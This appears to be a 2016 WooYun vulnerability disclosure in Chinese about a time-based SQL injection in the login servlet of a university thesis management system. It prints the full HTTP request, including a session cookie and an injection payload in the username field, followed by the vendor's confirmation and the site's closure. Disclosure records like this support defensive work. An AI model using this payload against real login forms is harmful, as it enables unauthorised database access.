乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-05: 细节已通知厂商并且等待厂商处理中 2016-05-06: 厂商已经确认,细节仅向厂商公开 2016-05-08: 厂商已经修复漏洞并主动公开,细节向公众公开
rt
问题站点:bsms.ccut.edu.cn论文管理系统
POST /ggs/servlet/LoginServlet HTTP/1.1Content-Length: 202Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://bsms.ccut.edu.cn/Cookie: JSESSIONID=38442B9BA32DF091B33F9AC0D97BCC34Host: bsms.ccut.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*password=g00dPa%24%24w0rD&submit=%e7%99%bb%e5%bd%95&type=2&username=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
过滤
危害等级:中
漏洞Rank:10
确认时间:2016-05-06 15:59
谢谢,联系处理
2016-05-08:已经处理
2016-05-08:没联系到开发人,网站关闭